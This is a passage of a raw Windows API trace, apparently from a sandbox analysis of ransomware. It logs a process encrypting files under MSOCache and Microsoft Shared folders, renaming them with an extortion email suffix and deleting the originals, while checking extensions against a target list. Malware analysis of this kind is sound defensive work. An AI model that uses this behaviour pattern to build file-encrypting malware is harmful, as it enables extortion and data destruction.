lpNumberOfBytesRead=0x2cafed4*=0x10b2, lpOverlapped=0x0) returned 1 [0034.910] WriteFile (in: hFile=0x1a4, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x10c0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x10c0, lpOverlapped=0x0) returned 1 [0034.911] ReadFile (in: hFile=0x19c, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0034.911] WriteFile (in: hFile=0x1a4, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xf0, lpOverlapped=0x0) returned 1 [0034.912] SetEndOfFile (hFile=0x1a4) returned 1 [0034.912] CloseHandle (hObject=0x1a4) returned 1 [0034.913] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.913] SetEndOfFile (hFile=0x19c) returned 1 [0034.914] CloseHandle (hObject=0x19c) returned 1 [0034.914] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0034.914] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 1 [0034.914] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0034.914] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0034.914] lstrlenW (lpString=".doc") returned 4 [0034.914] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.914] lstrlenW (lpString=".docx") returned 5 [0034.914] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0034.914] lstrlenW (lpString=".pdf") returned 4 [0034.914] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.914] lstrlenW (lpString=".xls") returned 4 [0034.914] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.915] lstrlenW (lpString=".xlsx") returned 5 [0034.915] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0034.915] lstrlenW (lpString=".ppt") returned 4 [0034.915] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.915] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0034.915] lstrlenW (lpString=".zip") returned 4 [0034.915] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.915] lstrlenW (lpString=".rar") returned 4 [0034.915] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.915] lstrlenW (lpString=".bz2") returned 4 [0034.915] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.915] lstrlenW (lpString=".7z") returned 3 [0034.915] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.915] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0034.915] lstrlenW (lpString=".dbf") returned 4 [0034.915] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.915] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0034.915] lstrlenW (lpString=".1cd") returned 4 [0034.915] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.915] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0034.915] lstrlenW (lpString=".jpg") returned 4 [0034.915] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.915] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0034.915] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0034.915] lstrlenW (lpString=".doc") returned 4 [0034.915] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.915] lstrlenW (lpString=".docx") returned 5 [0034.915] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0034.915] lstrlenW (lpString=".pdf") returned 4 [0034.915] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.915] lstrlenW (lpString=".xls") returned 4 [0034.915] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.915] lstrlenW (lpString=".xlsx") returned 5 [0034.916] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0034.916] lstrlenW (lpString=".ppt") returned 4 [0034.916] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.916] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0034.916] lstrlenW (lpString=".zip") returned 4 [0034.916] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.916] lstrlenW (lpString=".rar") returned 4 [0034.916] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.916] lstrlenW (lpString=".bz2") returned 4 [0034.916] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.916] lstrlenW (lpString=".7z") returned 3 [0034.916] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.916] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0034.916] lstrlenW (lpString=".dbf") returned 4 [0034.916] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.916] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0034.916] lstrlenW (lpString=".1cd") returned 4 [0034.916] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.916] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0034.916] lstrlenW (lpString=".jpg") returned 4 [0034.916] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.916] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0034.916] lstrlenW (lpString="ProPlusrWW.xml") returned 14 [0034.916] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0035.166] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=16852) returned 1 [0035.166] CloseHandle (hObject=0x1b8) returned 1 [0035.176] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml")) returned 0x2020 [0035.183] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0035.185] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0035.186] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0035.186] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0035.186] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0035.186] GetLastError () returned 0x0 [0035.186] ReadFile (in: hFile=0x1b8, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x41d4, lpOverlapped=0x0) returned 1 [0035.188] WriteFile (in: hFile=0x1bc, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x41e0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x41e0, lpOverlapped=0x0) returned 1 [0035.189] ReadFile (in: hFile=0x1b8, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0035.189] WriteFile (in: hFile=0x1bc, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xf0, lpOverlapped=0x0) returned 1 [0035.190] SetEndOfFile (hFile=0x1bc) returned 1 [0035.190] CloseHandle (hObject=0x1bc) returned 1 [0035.190] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0035.190] SetEndOfFile (hFile=0x1b8) returned 1 [0035.191] CloseHandle (hObject=0x1b8) returned 1 [0035.191] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0035.192] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml")) returned 1 [0035.192] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0035.192] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0035.192] lstrlenW (lpString=".doc") returned 4 [0035.192] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.192] lstrlenW (lpString=".docx") returned 5 [0035.192] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0035.192] lstrlenW (lpString=".pdf") returned 4 [0035.192] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.192] lstrlenW (lpString=".xls") returned 4 [0035.192] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.192] lstrlenW (lpString=".xlsx") returned 5 [0035.192] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0035.192] lstrlenW (lpString=".ppt") returned 4 [0035.192] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.192] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0035.192] lstrlenW (lpString=".zip") returned 4 [0035.192] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.192] lstrlenW (lpString=".rar") returned 4 [0035.192] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.192] lstrlenW (lpString=".bz2") returned 4 [0035.192] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.192] lstrlenW (lpString=".7z") returned 3 [0035.193] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.193] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0035.193] lstrlenW (lpString=".dbf") returned 4 [0035.193] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.193] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0035.193] lstrlenW (lpString=".1cd") returned 4 [0035.193] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.193] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0035.193] lstrlenW (lpString=".jpg") returned 4 [0035.193] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.193] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0035.193] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0035.193] lstrlenW (lpString=".doc") returned 4 [0035.193] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.193] lstrlenW (lpString=".docx") returned 5 [0035.193] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0035.193] lstrlenW (lpString=".pdf") returned 4 [0035.193] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.193] lstrlenW (lpString=".xls") returned 4 [0035.193] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.193] lstrlenW (lpString=".xlsx") returned 5 [0035.193] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0035.193] lstrlenW (lpString=".ppt") returned 4 [0035.194] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.194] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0035.194] lstrlenW (lpString=".zip") returned 4 [0035.194] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.194] lstrlenW (lpString=".rar") returned 4 [0035.194] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.194] lstrlenW (lpString=".bz2") returned 4 [0035.194] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.194] lstrlenW (lpString=".7z") returned 3 [0035.194] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.194] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0035.194] lstrlenW (lpString=".dbf") returned 4 [0035.194] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.194] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0035.194] lstrlenW (lpString=".1cd") returned 4 [0035.194] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.194] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0035.194] lstrlenW (lpString=".jpg") returned 4 [0035.194] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.194] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0035.194] lstrlenW (lpString="MS.GIF") returned 6 [0035.194] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0035.195] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=1069) returned 1 [0035.195] CloseHandle (hObject=0x1b8) returned 1 [0035.195] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif")) returned 0x20 [0035.195] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0035.195] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0035.195] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0035.195] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0035.195] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0035.195] GetLastError () returned 0x0 [0035.195] ReadFile (in: hFile=0x1b8, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x42d, lpOverlapped=0x0) returned 1 [0035.197] WriteFile (in: hFile=0x1bc, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x430, lpOverlapped=0x0) returned 1 [0035.201] ReadFile (in: hFile=0x1b8, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0035.201] WriteFile (in: hFile=0x1bc, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xe0, lpOverlapped=0x0) returned 1 [0035.201] SetEndOfFile (hFile=0x1bc) returned 1 [0035.201] CloseHandle (hObject=0x1bc) returned 1 [0035.202] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0035.202] SetEndOfFile (hFile=0x1b8) returned 1 [0035.202] CloseHandle (hObject=0x1b8) returned 1 [0035.202] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0035.203] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif")) returned 1 [0035.203] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0035.203] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0035.203] lstrlenW (lpString=".doc") returned 4 [0035.203] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0035.203] lstrlenW (lpString=".docx") returned 5 [0035.203] lstrcmpiW (lpString1=".docx", lpString2="S.GIF") returned -1 [0035.203] lstrlenW (lpString=".pdf") returned 4 [0035.203] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0035.203] lstrlenW (lpString=".xls") returned 4 [0035.203] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0035.203] lstrlenW (lpString=".xlsx") returned 5 [0035.203] lstrcmpiW (lpString1=".xlsx", lpString2="S.GIF") returned -1 [0035.203] lstrlenW (lpString=".ppt") returned 4 [0035.203] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0035.203] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0035.203] lstrlenW (lpString=".zip") returned 4 [0035.203] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0035.203] lstrlenW (lpString=".rar") returned 4 [0035.203] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0035.203] lstrlenW (lpString=".bz2") returned 4 [0035.204] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0035.204] lstrlenW (lpString=".7z") returned 3 [0035.204] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0035.204] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0035.204] lstrlenW (lpString=".dbf") returned 4 [0035.204] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0035.204] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0035.204] lstrlenW (lpString=".1cd") returned 4 [0035.204] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0035.204] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0035.204] lstrlenW (lpString=".jpg") returned 4 [0035.204] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0035.204] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0035.204] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0035.204] lstrlenW (lpString=".doc") returned 4 [0035.204] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0035.204] lstrlenW (lpString=".docx") returned 5 [0035.204] lstrcmpiW (lpString1=".docx", lpString2="S.GIF") returned -1 [0035.204] lstrlenW (lpString=".pdf") returned 4 [0035.204] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0035.204] lstrlenW (lpString=".xls") returned 4 [0035.204] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0035.204] lstrlenW (lpString=".xlsx") returned 5 [0035.204] lstrcmpiW (lpString1=".xlsx", lpString2="S.GIF") returned -1 [0035.204] lstrlenW (lpString=".ppt") returned 4 [0035.204] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0035.204] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0035.204] lstrlenW (lpString=".zip") returned 4 [0035.204] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0035.204] lstrlenW (lpString=".rar") returned 4 [0035.204] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0035.204] lstrlenW (lpString=".bz2") returned 4 [0035.205] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0035.205] lstrlenW (lpString=".7z") returned 3 [0035.205] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0035.205] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0035.205] lstrlenW (lpString=".dbf") returned 4 [0035.205] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0035.205] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0035.205] lstrlenW (lpString=".1cd") returned 4 [0035.205] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0035.205] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0035.205] lstrlenW (lpString=".jpg") returned 4 [0035.205] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0035.205] lstrcmpiW (lpString1=".JPG", lpString2=".USA") returned -1 [0035.205] lstrlenW (lpString="MS.JPG") returned 6 [0035.205] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0035.206] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=1061) returned 1 [0035.206] CloseHandle (hObject=0x1b8) returned 1 [0035.206] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg")) returned 0x20 [0035.206] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0035.206] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0035.206] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0035.206] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0035.207] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0035.207] GetLastError () returned 0x0 [0035.207] ReadFile (in: hFile=0x1b8, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x425, lpOverlapped=0x0) returned 1 [0035.208] WriteFile (in: hFile=0x1bc, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x430, 